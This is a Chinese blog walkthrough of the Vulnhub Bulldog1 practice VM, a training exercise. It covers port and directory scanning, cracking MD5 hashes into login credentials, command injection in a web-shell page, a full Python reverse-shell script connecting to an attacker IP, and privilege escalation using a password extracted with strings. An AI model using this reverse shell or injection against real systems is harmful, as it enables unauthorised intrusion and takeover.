Bulldog1

最新推荐文章于 2024-06-03 20:06:58 发布
最新推荐文章于 2024-06-03 20:06:58 发布
阅读量666 收藏 2
点赞数 1
分类专栏: 渗透测试 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haha13l4/article/details/90370058
版权

一、 收集信息

1、 扫描存活主机,找到目标机的ip
在这里插入图片描述
2、 扫描目标机的端口信息。
在这里插入图片描述
说明可以通过80或8080来访问它
3、 查看一些指纹信息
在这里插入图片描述
4、因为是自己搭的所以不需要被动收集

二、 web渗透

1、通过访问发现没有神什么可用信息,就两个页面,审查里面元素也没有可用信息。
在这里插入图片描述
在这里插入图片描述
2、 扫目录
在这里插入图片描述
在这里插入图片描述
扫出来目录不多,可以打开看看,也可以用自己的字典
多了一条
http://192.168.88.128/robots.txt

3、 自己尝试敏感目录

3.1、发现后台
在这里插入图片描述
3.1.1、尝试弱口令登录
结果失败
也可以爆破,但是用户名和密码都知道,很难。
3.1.2、审查元素
在这里插入图片描述
好像32md5,但是通过md5解不出来
最后发现浏览器不一样,这个值也不一样,感觉放弃
3.2、查看其他页面最终发现
在这里插入图片描述
3.2.1、解密md5
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
没钱的话,去其他网站解密
在这里插入图片描述
3.2.2、通过上面发现这两条md5的对应的是
在这里插入图片描述
3.2.3、猜测@前面的是他的账号,然后尝试登陆。
nick--------bulldog
sarah-------bulldoglover
在这里插入图片描述
登陆成功。
3.2.4、 再次访问web-shell页面
在这里插入图片描述
但是只能执行上面的命令。其他的命令不可以。所以需要获取shell
在这里插入图片描述

三、 获取shell

1、发现有命令注入
在这里插入图片描述
2、前面信息收集发现他是python写的,所以可以执行python脚本,我们用echo写一个python脚本,来反弹shell。

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.88.141",33333))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

在这里插入图片描述
在这里插入图片描述
等等
3、然后在kali用nc监听33333端口,在执行pwd&1.py
在这里插入图片描述
执行pwd&1.py
在这里插入图片描述
4、 得到shell
在这里插入图片描述
5、 但是发现权限是不够的

四、 提权

1、查看用户信息
cat etc/passwd
在这里插入图片描述
发现这两个用户值得关注
2、看家目录
在这里插入图片描述
每个都进去查看
3、 最后发现
在这里插入图片描述
在这里插入图片描述
打开是数据流看不懂
在这里插入图片描述
利用strings查看可执行文件中的内容;(strings命令用来提取和显示非文本文件中的文本字符串)
在这里插入图片描述
得到:SUPERultHimatePASHSWORDyouHCANTget 尝试去掉其中的H
SUPERultimatePASSWORDyouCANTget
意思是:你得到了特别伪装的最终密码

4、 尝试密码
在这里插入图片描述
su命令不能执行;
用python命令打开一个新的终端,尝试进行提权,输入命令: python -c ‘import pty; pty.spawn("/bin/bash")’
在这里插入图片描述
提权成功

haha13l4
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)
qq_45722813的博客
11-15 2614
Vulnhub靶场渗透测试系列-bulldog 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware,设置网络模式为NAT模式,开启靶机虚拟机 在kali攻击机使用命令nmap -Pn 192.168.172.1/24来获取靶机的IP地址 这里如果实在扫不出来靶机IP地址的话参考这篇文章来进行设置 https://blog.csdn.net/qq_45722813/article/details/121324686 得到靶机IP地
【Bulldog】靶场记录
weixin_46411728的博客
09-18 865
bulldog靶场
vuInhub靶场实战系列--bulldog-1
最新发布
weixin_45221204的博客
06-03 1193
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍bulldog-1靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)MD5在线解码、netcat、反弹shell、linux内核提权等内容。😃使用nmap进行主机发现和端口扫描使用dirbsearch进行目录扫描MD5解密netcat监听反弹shell。
VulnHub渗透测试实战靶场 - Bulldog: 1
LYJ20010728的博客
08-05 475
VulnHub渗透测试实战靶场 - Bulldog: 1环境下载Bulldog: 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Bulldog: 1靶机搭建 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualBox的Host-only 获取到IP地址为:192.168.56.101 渗透测试 信
【甄选靶场】Vulnhub百个项目渗透——项目四十五:bulldog-1(waf绕过)
人间体佐菲的博客
10-21 636
【甄选靶场】Vulnhub百个项目渗透——45、项目四十五:bulldog-1(waf绕过)
靶机渗透实战2:Bulldog: 1
anbangsi3839的博客
07-19 210
一、准备说明: 攻击机:WMware 中的 Kali Linux 靶机:VMware 中的Bulldog: 1(下载地址:https://www.vulnhub.com/entry/bulldog-1,211/) 目标:Escalate the privileges to root and capture the flag 二、信息收集 2.1 端口扫描,服务指纹识别: n...
BULLDOG-开源
05-27
【标题】"BULLDOG-开源"所涉及的知识点主要围绕着开源工作流解决方案Bulldog以及与其关联的J2EE容器和Tomcat展开。 首先,Bulldog作为一个开源项目,意味着它的源代码对公众开放,允许用户查看、使用、修改并分发...
vuInhub靶场实战系列-bulldog-1
06-03
vuInhub靶场实战系列-bulldog-1
bulldog_shop
05-09
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) ...
Bulldog-Bucks:一个用于管理Gonzaga的Bulldog Bucks的Android应用程序
05-14
Bulldog Bucks专为Gonzaga大学的学生设计,可快速轻松地管理他们的Bulldog Bucks。 这个Android应用程式的灵感来自创建 。 学生ID和PIN仅在本地存储在移动设备上。 从安装android应用程序,或从此存储库下载源...
British Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的British Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
靶机渗透(二)bulldog1
qq_42180996的博客
04-26 1610
靶机bulldog1 一、实验环境 二、实验步骤 (一)信息收集 1.查询测试机IP地址,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/namp) (二)http服务(80/8080端口) 1.靶机开启apache服务,尝试web渗透 2.网站指纹信息扫描(whatweb) 3.目录扫描(dirb) 4.查看/admin页面 5....
bulldog2
haha1314的博客
05-22 548
一、 信息收集 1、 发现主机 发现有两个ip,尝试之后,都可以登录 下面采取192.168.88.132做测试 2、 检测端口 3、 探测指纹 二、 web渗透 1、 发现一个登陆和注册页面 但是并不能注册,也不能登陆。 2、 发现有js源代码泄露 发现需要name—email—username—password 3、 登陆抓包分析,看能不能注册。 3.1、尝试在后面加和姓名和邮箱...
Vulnhub靶场渗透练习(三) bulldog
weixin_30563917的博客
07-08 193
拿到靶场后先对ip进行扫描 获取ip 和端口 针对项目路径爆破 获取两个有用文件 http://192.168.18.144/dev/ dev,admin 更具dev 发现他们用到框架和语言 找到一个 shell 连接 http://192.168.18.144/dev/shell/ 反健源码 查看可以看到 丢入md5 网站解密 成功的解密2...
【渗透测试】靶机渗透Vulnhub-bulldog
SunnyCat
06-01 2623
目录前言一、bulldog靶机安装二、bulldog靶机渗透1、信息搜集2、Web渗透--后台登录3、Web渗透--命令注入&nc反弹shell4、权限提升渗透步骤回顾感悟 前言 bulldog靶机的渗透有很多的前辈都做了教程,我这篇也是参考了许多前辈的博客,但是中间还是有很多不懂得地方,官方说有两条路可以拿到root,我只找到了一条。以下内容均是我作为一个菜鸡实操之后的所得,为了留个印子记下来。 参考博客: https://blog.csdn.net/Eastmount/article/detai
渗透测试实战2--bulldog2靶机入侵
qq_45070118的博客
08-08 449
信息收集 用户先登录,用dhclient自动获取ip Kali Nmap扫描 nmap -sn 192.168.10.1/24 扫描端口 masscan --rate=10000 --ports 0-65535 192.168.10.133 扫描开放端口的详细信息 nmap -sV -T4 -p 80 192.168.10.133 searchsploit nginx 网站版本 ka...
【VulnHub靶机渗透】一:BullDog2
野原新之助
03-20 1008
在网上大佬WriteUp的帮助下,成功完成了第一次完整的靶机渗透测试,熟悉了整体步骤,希望之后的靶机能越来越多的自己独立完成(大佬NB!),现将详细过程做如下整理。 简介 ...
Vulnhub-Bulldog1 靶机渗透
Majula
02-01 572
WalkthroughDownloadDescriptionPen TestingScanningExploitationPrivilege EscalationSolution ISolution IIReview Download BULLDOG: 1 - VlunHub VM 镜像文件。 这里 VM 我导入配置失败,分配不了 IP,建议用 VirtualBox,因为靶机默认模式是桥接,攻击机也要设为桥接模式。 我是 VM 运行 Kali,VirtualBox 运行靶机,如果你是这种情况,为了更加直观,
靶机渗透测试实战(四)——Bulldog2渗透实战
橘子女侠
05-10 2872
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (1)信息收集——主机发现 (2)信息收集——端口扫描 (3)信息收集——操作系统扫描 (4)渗透测试 四. 实验总结 一. 实验环境 靶机:Bulldog2 IP地址暂时未知; 测试机:kali IP地址:192.168.37.131 测试机:物理机win7 二. 实验流程 信息收集——主机发现 信息...
实现一个双向适配器实例,使得猫(Cat)可以学狗(Dog)叫,狗可以学猫抓老鼠。绘制相应类图并使用代码编程模拟。
04-01
以下是双向适配器类图和实现代码: ![adapter-pattern](https://user-images.githubusercontent.com/45758449/116464798-0e07c280-a89d-11eb-8b3e-7c3a88b9c7d9.png) ```python # Target interface class Cat: def catch_mice(self) -> str: pass # Adaptee interface class Dog: def bark(self) -> str: pass # Adaptee class Bulldog(Dog): def bark(self) -> str: return "Woof! Woof!" # Adapter class DogAdapter(Cat): def __init__(self, dog: Dog): self.dog = dog def catch_mice(self) -> str: return self.dog.bark() # Client code if __name__ == "__main__": bulldog = Bulldog() cat = Cat() adapter = DogAdapter(bulldog) print(adapter.catch_mice()) # Output: Woof! Woof! ``` 在上面的代码中,我们有一个Target接口 `Cat`,它定义了一个`catch_mice()`方法,表示猫抓老鼠。我们还有一个Adaptee接口`Dog`,它定义了一个`bark()`方法,表示狗叫。`Bulldog`是`Dog`接口的一个具体实现。 现在我们需要一个适配器类`DogAdapter`来使得猫可以学狗叫。它实现了`Cat`接口,并将`Dog`对象作为适配器构造函数的参数。在`catch_mice()`方法中,它调用`Dog`对象的`bark()`方法来模拟狗叫声。 在客户端代码中,我们创建了一个`Bulldog`对象和一个`Cat`对象。然后我们创建了一个`DogAdapter`对象,并将`Bulldog`对象传递给它。最后,我们通过适配器对象调用`catch_mice()`方法,并输出适配的结果。 这就是双向适配器模式的一个简单实现。当然,你可以根据自己的需求和场景来进行改进和扩展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值